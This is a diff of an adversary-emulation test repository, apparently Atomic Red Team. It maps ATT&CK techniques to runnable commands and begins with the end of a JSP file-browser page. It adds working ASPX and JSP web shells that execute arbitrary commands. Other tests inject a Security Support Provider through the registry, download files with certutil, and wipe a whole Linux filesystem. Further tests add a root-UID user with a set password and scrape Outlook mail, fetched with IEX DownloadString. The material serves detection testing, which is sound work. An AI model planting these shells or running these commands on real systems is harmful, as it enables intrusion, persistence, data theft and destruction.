if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+ "\">Unpack</a>";
else elink = ahref + "editfile=" + name + "\">Edit</a>";
}
else { // If the file cannot be edited
//If it is a zip or jar File you can unpack it
if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+ "\">Unpack</a>";
else elink = ahref + "editfile=" + name + "\">View</a>";
}
}
else {
link = buf;
}
}
String date = dateFormat.format(new Date(entry[i].lastModified()));
out.println("<tr class=\"mouseout\" onmouseup=\"selrow(this, 2)\" "
+ "onmouseover=\"selrow(this, 0);\" onmouseout=\"selrow(this, 1)\">");
if (entry[i].canRead()) {
out.println("<td align=center><input type=\"checkbox\" name=\"selfile\" value=\""
+ name + "\" onmousedown=\"dis()\"></td>");
}
else {
out.println("<td align=center><input type=\"checkbox\" name=\"selfile\" disabled></td>");
}
out.print("<td align=left> &nbsp;" + link + "</td>");
if (entry[i].isDirectory()) out.print("<td>&nbsp;</td>");
else {
out.print("<td align=right title=\"" + entry[i].length() + " bytes\">"
+ convertFileSize(entry[i].length()) + "</td>");
}
out.println("<td align=\"center\">" + type + "</td><td align=left> &nbsp;" + // The file type (extension)
date + "</td><td>" + // The date the file was created
dlink + "</td>"); // The download link
if (!READ_ONLY)
out.print ("<td>" + elink + "</td>"); // The edit link (or view, depending)
out.println("</tr>");
}
}%>
</table>
<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
<p align=center>
<b title="<%=totalSize%> bytes">
<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
</b>
</p>
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input title="Download selected files and directories as one zip file" class="button" id="but_Zip" type="Submit" name="Submit" value="<%=SAVE_AS_ZIP%>">
<% if (!READ_ONLY) {%>
<input title="Delete all selected files and directories incl. subdirs" class="button" id="but_Del" type="Submit" name="Submit" value="<%=DELETE_FILES%>"
onclick="return confirm('Do you really want to delete the entries?')">
<% } %>
<% if (!READ_ONLY) {%>
<br />
<input title="Enter new dir or filename or the relative or absolute path" class="textfield" type="text" onKeypress="event.cancelBubble=true;" id="text_Dir" name="cr_dir">
<input title="Create a new directory with the given name" class="button" id="but_NDi" type="Submit" name="Submit" value="<%=CREATE_DIR%>">
<input title="Create a new empty file with the given name" class="button" id="but_NFi" type="Submit" name="Submit" value="<%=CREATE_FILE%>">
<input title="Move selected files and directories to the entered path" id="but_Mov" class="button" type="Submit" name="Submit" value="<%=MOVE_FILES%>">
<input title="Copy selected files and directories to the entered path" id="but_Cop" class="button" type="Submit" name="Submit" value="<%=COPY_FILES%>">
<input title="Rename selected file or directory to the entered name" id="but_Ren" class="button" type="Submit" name="Submit" value="<%=RENAME_FILE%>">
<% } %>
</form>
<br />
<div class="formular">
<% if (ALLOW_UPLOAD) { %>
<form class="formular2" action="<%= browser_name%>" enctype="multipart/form-data" method="POST">
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input type="file" class="textfield" onKeypress="event.cancelBubble=true;" name="myFile">
<input title="Upload selected file to the current working directory" type="Submit" class="button" name="Submit" value="<%=UPLOAD_FILES%>"
onClick="javascript:popUp('<%= browser_name%>')">
</form>
<%} %>
<% if (NATIVE_COMMANDS) {%>
<form class="formular2" action="<%= browser_name%>" method="POST">
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input type="hidden" name="command" value="">
<input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="<%=LAUNCH_COMMAND%>">
</form><%
}%>
</div>
<%}%>
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
<%@include file="../footer.jsp" %>
</body>
</html><%
}
%>
atomics/T1100/shells/cmd.aspx
+37
View File
@@ -0,0 +1,37 @@
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
atomics/T1100/shells/tests.jsp
+26
View File
@@ -0,0 +1,26 @@
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
atomics/T1101/T1101.md
+30 -23
View File
@@ -1,27 +1,34 @@
---
attack_technique: T1101
display_name: Security Support Provider
# T1101 - Security Support Provider
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101)
<blockquote>Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.
(Citation: Graeber 2014)</blockquote>
atomic_tests:
- name: Modify SSP configuration in registry
description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
supported_platforms:
- windows
input_arguments:
fake_ssp_dll:
description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32.
type: String
default: not-a-ssp
## Atomic Tests
executor:
name: powershell
command: |
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
- [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry)
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
<br/>
## Atomic Test #1 - Modify SSP configuration in registry
Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
#### Run it with `powershell`!
```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
```
<br/>
atomics/T1101/T1101.yaml
+27
View File
@@ -0,0 +1,27 @@
---
attack_technique: T1101
display_name: Security Support Provider
atomic_tests:
- name: Modify SSP configuration in registry
description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
supported_platforms:
- windows
input_arguments:
fake_ssp_dll:
description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32.
type: String
default: not-a-ssp
executor:
name: powershell
command: |
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "#{fake_ssp_dll}"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
# revert (before reboot)
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
atomics/T1105/T1105.md
+46
View File
@@ -18,6 +18,10 @@ Adversaries may also copy files laterally between internal victim systems to sup
- [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)
- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)
- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)
<br/>
@@ -145,3 +149,45 @@ Utilize sftp to perform a remote file copy (pull)
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
## Atomic Test #7 - certutil download (urlcache)
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
<br/>
<br/>
## Atomic Test #8 - certutil download (verifyctl)
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `powershell`!
```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
```
<br/>
atomics/T1105/T1105.yaml
+40
View File
@@ -170,3 +170,43 @@ atomic_tests:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
- name: certutil download (urlcache)
description: |
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: |
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
- name: certutil download (verifyctl)
description: |
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
atomics/T1107/T1107.md
+17 -2
View File
@@ -28,6 +28,8 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
<br/>
@@ -184,7 +186,7 @@ wmic shadowcopy delete
<br/>
## Atomic Test #10 - bcdedit
xxx
This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
@@ -198,7 +200,7 @@ bcdedit /set {default} recoveryenabled no
<br/>
## Atomic Test #11 - wbadmin
xxx
This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
@@ -208,3 +210,16 @@ xxx
wbadmin delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #12 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux, CentOS, Ubuntu
#### Run it with `bash`!
```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
<br/>
atomics/T1107/T1107.yaml
+14 -2
View File
@@ -132,7 +132,7 @@ atomic_tests:
- name: bcdedit
description: |
xxx
This test leverages `bcdedit` to remove boot-time recovery measures.
supported_platforms:
- windows
executor:
@@ -143,10 +143,22 @@ atomic_tests:
- name: wbadmin
description: |
xxx
This test deletes Windows Backup catalogs.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wbadmin delete catalog -quiet
- name: Delete Filesystem - Linux
description: |
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- linux
- centos
- ubuntu
executor:
name: bash
command: |
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
atomics/T1110/T1110.md
+20 -2
View File
@@ -2,11 +2,29 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)
<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
[Credential Dumping](https://attack.mitre.org/techniques/T1003) to obtain password hashes may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)</blockquote>
A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</blockquote>
## Atomic Tests
atomics/T1112/T1112.md
+1 -1
View File
@@ -4,7 +4,7 @@
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reg)hide NOV 2006 Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.</blockquote>
atomics/T1114/Get-Inbox.ps1
+61
View File
@@ -0,0 +1,61 @@
<#
.SYNOPSIS
Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed
Outlook Email Collection
MITRE ATT&CK - T1114
Author: Greg Foss (@heinzarelli)
Date: February, 2019
License: BSD 3-Clause
.EXAMPLE
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
#>
[CmdLetBinding()]
param( [string]$file )
function Kill-Outlook {
# Check to see if outlook is running, and close it to scrape mail data programmatically
$outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue
if ($outlook) {
$outlook.CloseMainWindow()
Sleep 5
if (!$outlook.HasExited) {
$outlook | Stop-Process -Force > $null
}
}
Remove-Variable outlook > $null
}
function Scrape-Outlook {
# Connect to the local outlook inbox and read mail
Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null
$olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type]
$inbox = new-object -comobject outlook.application
$namespace = $inbox.GetNameSpace("MAPI")
$folder = $namespace.getDefaultFolder($olFolders::olFolderInBox)
Write-Output "Please be patient, this may take some time..."
# Output the data
if ( $file ) {
$folder.items |
Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body |
Export-Csv -Path $file
} else {
$folder.items |
Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName
}
}
Kill-Outlook > $null
Scrape-Outlook
Kill-Outlook > $null
atomics/T1114/T1114.md
+35
View File
@@ -0,0 +1,35 @@
# T1114 - Email Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
<blockquote>Adversaries may target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</blockquote>
## Atomic Tests
- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
<br/>
## Atomic Test #1 - T1114 Email Collection with PowerShell
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
Download and Execute
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
```
<br/>
atomics/T1114/T1114.yaml
+25
View File
@@ -0,0 +1,25 @@
---
attack_technique: T1114
display_name: Email Collection
attack_link: https://attack.mitre.org/wiki/Technique/T1114
atomic_tests:
- name: T1114 Email Collection with PowerShell
description: |
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
Download and Execute
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
atomics/T1122/T1122.md
+1 -1
View File
@@ -1,6 +1,6 @@
# T1122 - Component Object Model Hijacking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1122)
<blockquote>The (Citation: Microsoft Component Object Model) (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
<blockquote>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
## Atomic Tests
atomics/T1136/T1136.md
+22
View File
@@ -14,6 +14,8 @@ The <code>net user</code> commands can be used to create a local or domain accou
- [Atomic Test #4 - Create a new user in PowerShell](#atomic-test-4---create-a-new-user-in-powershell)
- [Atomic Test #5 - Create a new user in Linux with `root` UID and GID.](#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid)
<br/>
@@ -95,3 +97,23 @@ New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
<br/>
<br/>
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID.
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
**Supported Platforms:** Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
#### Run it with `bash`!
```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
<br/>
atomics/T1136/T1136.yaml
+20
View File
@@ -77,3 +77,23 @@ atomic_tests:
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
- name: Create a new user in Linux with `root` UID and GID.
description: |
Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
supported_platforms:
- linux
input_arguments:
username:
description: Username of the user to create
type: String
default: butter
password:
description: Password of the user to create
type: String
default: BetterWithButter
executor:
name: bash
command: |
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
atomics/T1137/T1137.md
+13 -1
View File
@@ -24,7 +24,19 @@ A Registry location was found that when a DLL reference was placed within it the
Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)</blockquote>
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
### Outlook Rules, Forms, and Home Page
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub)
Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook Forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
To abuse these features, an adversary requires prior access to the users Outlook mailbox, either via an Exchange/OWA server or via the client application. Once malicious rules, forms, or Home Pages have been added to the users mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded while malicious rules and forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)(Citation: SensePost Outlook Forms)(Citation: SensePost Outlook Home Page)</blockquote>
## Atomic Tests
atomics/T1138/T1138.md
+3 -1
View File
@@ -1,6 +1,8 @@
# T1138 - Application Shimming
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1138)
<blockquote>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS. A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
<blockquote>The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* <code>%WINDIR%\AppPatch\sysmain.sdb</code>
* <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>
atomics/T1140/T1140.md
+2 -2
View File
@@ -6,7 +6,7 @@ One such example is use of [certutil](https://attack.mitre.org/software/S0160) t
Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.</blockquote>
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.</blockquote>
## Atomic Tests
@@ -50,6 +50,6 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
#### Run it with `command_prompt`!
```
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
```
<br/>
atomics/T1140/T1140.yaml
+1 -1
View File
@@ -39,4 +39,4 @@ atomic_tests:
name: command_prompt
command: |
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
